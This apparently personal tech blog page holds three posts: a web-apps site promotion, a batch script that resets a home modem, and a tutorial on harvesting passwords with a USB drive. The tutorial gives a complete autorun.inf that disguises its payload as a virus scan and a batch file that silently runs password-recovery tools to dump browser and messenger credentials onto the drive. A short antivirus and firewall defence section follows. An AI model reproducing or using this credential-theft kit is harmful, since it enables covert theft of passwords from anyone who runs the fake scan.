How to do everything online

The World has changed rapidly over the past 10 years. We are now connected to the Web not only  from all over the world but also from almost all our devices.

This ubiquitous growth of the Internet is only waiting to enter our lives in more dramatic ways.

Imagine using the web as a place to store all your data, edit all you word and excel files, play music, message friends, browse the internet without losing your anonymity, run an operating system….. and imagine doing all this inside that little browser on which you are reading this page!

This is not something from the future but the present. A website has been silently putting together a collection of web based software to do exactly these tasks and even more! The website in question is MyWebgrams.com

myWebgrams-logo

They have used a layout similar to that used by filehippo.com It makes it easier for you to look for the apps to do your job. You’ll find the best software in each category listed in the first page. You can find an even larger collection in subsequent pages.

This website will be very useful for People using Netbooks and also for people on the go. They have an unobtrusive ads system; so it’s easy to find what you need. Truly - “Find the web apps to do your job in seconds”.

How to automatically turn on and turn off your computer for Night Unlimited Plans

[This article has special focus on the Huawei SmartAX MT882 DSL modem]
[Update: Re-written with a better hack on November 14th]
How about having your computer start up by itself; Download stuff at the odd times in the night that your telco feels you can enjoy unlimited plans; and then sleep/shutdown by itself; while you sleep soundly all the while :)
That's exactly what we'll learn to do.

Software you'll be using (200KB)
Wake up on stand by http://www.dennisbabkin.com/php/download.php?what=WOSB


I just love this simple software to turn on and turn off the PC. It does it's job as advertised and is quite simple to use. The screenshot below shows the program with preferences set to start utorrent (you can have anything here) at 2:10AM and then turn off the computer at 7:50 AM.

WOSB

We'll also make use of Scheduled tasks in windowsj; with the scheduled tasks you can have even more programs turning on automatically. You can find a neat write up on using Scheduled tasks here
http://kougon.blogspot.com/2008/08/how-to-make-best-use-of-your-limited.html

If your service provider times your connection properly then this should be it. You're done and enjoy your sleep.
But I've found that certain operators don't have enough intelligence in their PC's and over-charge you for using your computer beyond your stipulated time. For eg: suppose your free download time ends at 8AM in the morning and you start a 200MB download at 7:50AM. By 7:59:59 you'd have downloaded 150MB and then by 8:03AM you download the remaining 50MB. But the stupid/whatever telco would charge you for the whole 200MB!!! In case you have had this problem use this work around.
The batch file below will simple issue commands to ur modem to disconnect and reconnect to the network. This way you'll have a time-stamp to disprove the telco.

Type out the lines between <---start of code----> and <---End of Code---> into notepad and save it as "bsnl.bat" or anything for that matter, the extension should be "*.bat"
<-------------------------------------Start of code--------------------------------------------------------->


Rem  batch file to Automatically reset modem
Echo off
cd C:\Program Files\Mozilla Firefox\
start firefox.exe
 

@ping 127.0.0.1 -n 4 -w 1000> nul  
 start firefox.exe http://admin:******@192.168.1.1/hwhtml/status/st_ppp_discon.html?ImServices.rfc1483-0.1


@ping 127.0.0.1 -n 4 -w 1000> nul
start firefox.exe http://admin:*****@192.168.1.1/hwhtml/status/st_ppp_connect.html?ImServices.rfc1483-0.1





<----------------------------------------------------End of Code----------------------------------------------------->


Code analysis: {skip it if you are okay using a random script }
line 1: it's simply a comment line
line 2: turn on Firefox {change the location if you installed firefox elsewheree}

line 3: this'll wait for a few milliseconds. This is to let firefox to turn on. 
line 4: this line of code will turn on firefox with the link shown. It'll simply disconnect the internet connection. 
line 5: another wait so that the modem has disconnected fully
line 6: this time we'll connect back to the network and the URL does just that




Now this batch file will be scheduled to run using Windows Scheduler. Schedule the batch file to be run twice. Once at around 2:11 Am. Just after the Computer is woken up by W.O.S.B and again just before the computer is shut down. that’s around 7-49AM in this case. Enjoy the limited unlimited plan with lots of sleep and no strings attached!

How to Obtain all Passwords in a Computer & How to Protect yourself from such an Attack.

 

   I’ll describe a procedure to obtain all passwords stored on a computer onto a Pen drive/ Flash Drive and later I’ll teach you how to protect yourself from such an attack.

   I’ll work in a folder called “Kougon Super Drive” But you can use any folder of your choice. You could also save all the files directly onto a pen drive

1. Open a Notepad file and type the following piece of code

[autorun]
open= scan.bat
ACTION= Perform a Virus Scan

Save the file as “autorun.inf”

save as Autorun

2.  Now we will need a few programs to rip passwords off Windows. A company called NIR soft has been making free software's that can do this using a clever piece of code. By using the link you can access all their recovery software's. I’ll use only a few of them

  • Messenger Pass (mspass) : This will recover all passwords from all Messengers.
  • IE pass view (iepv) : Recover passwords saved on Internet Explorer
  • Password Fox (passwordFox): Recovers all Firefox passwords.

Extract all the Executable files after you download the above softwares and place them in a folder called “ passes “. This folder must be inside the current working Folder.

Now all these utilities can be called using Command line parameters. We’ll now write a batch file to call them silently and save the resulting password onto a series of HTML files

3. Open Notepad and type the following piece of code 

@echo off
set number=1

:looper
if exist "passes/mspass%number%.html" set /a number=%number%+1
if not exist "passes/mspass%number%.html" goto savepasses
goto looper

:savepasses

start passes/mspass.exe /shtml passes/mspass%number%.html

start passes/iepv.exe /shtml passes/iepv%number%.html

start passes/passwordfox.exe /shtml passes/passwordfox%number%.html

Save this file as “scan.bat” . Save it in the same location as autorun.inf and one level above the passes folder.

4. Copy all these files into a Pen Drive

kougon disk

5.  Every time this disk is inserted into a computer you will get  an option to “scan the computer”. Run the scan and lo! all the passwords will be dumped in neat HTML files in the passes folder. The filenames will be automatically incremented after each iteration so you don’t have to bother changing the file names.

DEFENCE from this Exploit

You can save yourself from this attack by using 2 free softwares. I recommend Avira’s Anitivir and C.O.M.O.D.O Personal Firewall. You may have to make small changes in the configuration of antivir.

Antivir is a free Anti-virus software produced by Avira. It has one of the best detection rates and Virus Removal efficiency. {Verify it online through Wikipedia}.

open Avira and click on “configuration”

avira

Check the  “Expert Mode” Radio button. Now click on “General” and click on “select all” for threat categories and hit apply. Just make sure you end up with the following window

threat

 

That’s it the anti-virus software will now detect all the password sniffing software's and will give you an option to prevent them from being executed.

 

In C.O.M.O.D.O Firewall ; just enable the Defense+ option. and keep it in the default “Safe PC mode”. This will protect your computer from any programs that wish to access memory locations that are used to store passwords.

comodo

image

This will Protect your computer from Prying eyes.

Contributors